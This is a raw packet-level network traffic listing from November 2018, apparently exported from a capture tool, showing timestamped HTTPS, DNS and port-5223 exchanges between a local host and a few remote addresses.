    Nov 2, 2018 11:01:23.131716967 MEZ49248443192.168.0.50192.30.253.113
    Nov 2, 2018 11:01:23.140351057 MEZ49248443192.168.0.50192.30.253.113
    Nov 2, 2018 11:01:23.140737057 MEZ49248443192.168.0.50192.30.253.113
    Nov 2, 2018 11:01:23.141038895 MEZ49248443192.168.0.50192.30.253.113
    Nov 2, 2018 11:01:23.144762993 MEZ49248443192.168.0.50192.30.253.113
    Nov 2, 2018 11:01:23.157824039 MEZ49248443192.168.0.50192.30.253.113
    Nov 2, 2018 11:01:23.157993078 MEZ49248443192.168.0.50192.30.253.113
    Nov 2, 2018 11:01:23.169727087 MEZ49248443192.168.0.50192.30.253.113
    Nov 2, 2018 11:01:23.174240112 MEZ49248443192.168.0.50192.30.253.113
    Nov 2, 2018 11:01:23.180963039 MEZ49248443192.168.0.50192.30.253.113
    Nov 2, 2018 11:01:23.181823969 MEZ49248443192.168.0.50192.30.253.113
    Nov 2, 2018 11:01:23.287863016 MEZ44349248192.30.253.113192.168.0.50
    Nov 2, 2018 11:01:23.287964106 MEZ44349248192.30.253.113192.168.0.50
    Nov 2, 2018 11:01:23.288078070 MEZ49248443192.168.0.50192.30.253.113
    Nov 2, 2018 11:01:23.288095951 MEZ49248443192.168.0.50192.30.253.113
    Nov 2, 2018 11:01:23.288511992 MEZ44349248192.30.253.113192.168.0.50
    Nov 2, 2018 11:01:23.288620949 MEZ49248443192.168.0.50192.30.253.113
    Nov 2, 2018 11:01:51.395665884 MEZ49241443192.168.0.50104.20.13.48
    Nov 2, 2018 11:01:51.395719051 MEZ49241443192.168.0.50104.20.13.48
    Nov 2, 2018 11:01:51.396038055 MEZ49241443192.168.0.50104.20.13.48
    Nov 2, 2018 11:01:51.400408030 MEZ44349241104.20.13.48192.168.0.50
    Nov 2, 2018 11:01:51.400509119 MEZ44349241104.20.13.48192.168.0.50
    Nov 2, 2018 11:01:51.400551081 MEZ44349241104.20.13.48192.168.0.50
    Nov 2, 2018 11:01:51.400710106 MEZ49241443192.168.0.50104.20.13.48
    Nov 2, 2018 11:02:18.934636116 MEZ5723053192.168.0.508.8.8.8
    Nov 2, 2018 11:02:18.939795017 MEZ53572308.8.8.8192.168.0.50
    Nov 2, 2018 11:02:53.319498062 MEZ5570353192.168.0.508.8.8.8
    Nov 2, 2018 11:02:53.344573975 MEZ53557038.8.8.8192.168.0.50
    Nov 2, 2018 11:02:53.413145065 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:53.518589973 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:53.518976927 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:53.528107882 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:53.634933949 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:53.635149956 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:53.635261059 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:53.635500908 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:53.635566950 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:53.641134977 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:53.649135113 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:53.754929066 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:53.755314112 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:53.757667065 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:53.864399910 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:53.864507914 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:53.864641905 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:53.864661932 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:53.864784002 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:53.864809990 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:53.864927053 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:53.864932060 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:53.865024090 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:53.865047932 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:53.865078926 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:53.865161896 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:53.865252018 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:53.865273952 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:53.865551949 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:53.866625071 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:53.866985083 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:53.970371008 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:53.970592976 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:53.970706940 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:53.970823050 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:53.970935106 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:53.970938921 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:53.971055031 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:53.971091032 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:53.971168995 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:53.971277952 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:53.971283913 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:53.971396923 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:53.971512079 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:53.971517086 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:53.971626997 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:53.971676111 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:53.971849918 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:53.971939087 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:53.971971035 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:53.972079039 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:53.972192049 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:53.972212076 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:53.972311020 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:53.972377062 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:53.972425938 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:53.972537994 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:53.972605944 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:53.972655058 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:53.972852945 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:53.973232031 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:53.973562956 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:53.973853111 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:53.974133968 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.076853991 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.077074051 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.077296972 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.077327967 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.077414036 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.077527046 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.077569962 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.077642918 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.077687025 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.077758074 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.077872038 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.077914000 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.077990055 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.078083992 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.078104019 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.078210115 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.078264952 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.078376055 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.078463078 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.078490019 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.078605890 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.078674078 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.078722954 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.078835011 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.078875065 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.078952074 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.079022884 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.079067945 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.079180002 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.079222918 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.079299927 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.079339027 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.079499960 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.179861069 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.183087111 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.183327913 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.183442116 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.183557034 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.183578968 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.183742046 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.184143066 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.184354067 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.184371948 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.184484959 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.184597969 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.184681892 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.184729099 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.184802055 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.184886932 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.184989929 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.184998989 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.185113907 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.185183048 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.185233116 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.185343981 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.185457945 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.185486078 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.185576916 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.185666084 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.185789108 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.185847044 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.185906887 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.186017990 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.186105967 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.186433077 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.285449982 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.285684109 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.285901070 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.289316893 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.289541006 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.289630890 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.290456057 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.290568113 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.290664911 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.290983915 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.291425943 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.291630983 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.291745901 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.291829109 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.291887045 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.291980028 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.292032003 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.292094946 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.292211056 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.292300940 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.292387962 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.292512894 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.292624950 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.292738914 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.292778015 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.292855978 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.292907953 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.292973042 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.293083906 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.293117046 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.293203115 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.293284893 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.293323040 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.293421984 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.293721914 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.391374111 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.391594887 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.391834974 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.395061016 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.395340919 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.395555019 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.396095991 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.396322966 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.396373987 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.396670103 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.397459984 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.397689104 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.397804022 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.397918940 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.397952080 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.398109913 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.398421049 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.398628950 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.398679018 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.398746967 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.398859024 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.398899078 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.398974895 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.399050951 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.399094105 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.399193048 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.399204969 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.399370909 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.399404049 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.399488926 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.399600029 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.399669886 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.399719000 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.399784088 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.399832964 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.399945974 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.399988890 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.400105000 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.400235891 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.497665882 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.497904062 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.498337984 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.500783920 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.501123905 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.542592049 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.543978930 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.648197889 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.648286104 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.648669004 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.648701906 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:02:54.649259090 MEZ44349249192.30.253.113192.168.0.50
    Nov 2, 2018 11:02:54.649548054 MEZ49249443192.168.0.50192.30.253.113
    Nov 2, 2018 11:03:45.207485914 MEZ491815223192.168.0.5017.188.165.205
    Nov 2, 2018 11:03:45.207942963 MEZ491915223192.168.0.5017.252.92.75
    Nov 2, 2018 11:03:45.233206987 MEZ52234919117.252.92.75192.168.0.50
    Nov 2, 2018 11:03:45.233423948 MEZ491915223192.168.0.5017.252.92.75
    Nov 2, 2018 11:03:45.317796946 MEZ52234918117.188.165.205192.168.0.50
    Nov 2, 2018 11:03:45.318030119 MEZ491815223192.168.0.5017.188.165.205
    Nov 2, 2018 11:04:24.682725906 MEZ6058353192.168.0.508.8.8.8
    Nov 2, 2018 11:04:24.711186886 MEZ53605838.8.8.8192.168.0.50
    Nov 2, 2018 11:04:24.730848074 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:24.836409092 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:24.836807013 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:24.845916986 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:24.952902079 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:24.953100920 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:24.953212976 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:24.953444958 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:24.953525066 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:24.959177017 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:24.967123032 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.073471069 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.073862076 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.074781895 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.224555969 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.229799032 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.229924917 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.230058908 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.230079889 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.230202913 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.230282068 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.230330944 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.230397940 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.230437040 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.230549097 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.230566978 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.230665922 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.230736971 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.230912924 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.231230974 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.231519938 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.231882095 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.232158899 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.335747004 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.335956097 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.336070061 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.336184978 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.336291075 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.336306095 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.336420059 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.336509943 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.336605072 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.336697102 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.336812019 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.336924076 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.337038040 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.337070942 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.337157011 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.337236881 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.337275982 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.337385893 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.337474108 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.337501049 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.337614059 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.337670088 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.337730885 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.337785006 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.337846994 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.337958097 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.338018894 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.338076115 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.338229895 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.338278055 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.338458061 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.338823080 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.339322090 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.339633942 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.442104101 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.442333937 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.442447901 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.442563057 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.442722082 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.442872047 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.443272114 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.443489075 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.443509102 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.443622112 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.443732023 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.443769932 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.443849087 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.443928003 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.444015026 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.444125891 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.444219112 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.444250107 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.444355965 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.444448948 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.444470882 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.444586039 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.444607973 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.444705009 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.444751978 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.444924116 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.444956064 MEZ49250443192.168.0.50192.30.253.112
    Nov 2, 2018 11:04:25.445039034 MEZ44349250192.30.253.112192.168.0.50
    Nov 2, 2018 11:04:25.445149899 MEZ44349250192.30.253.112192.168.0.50
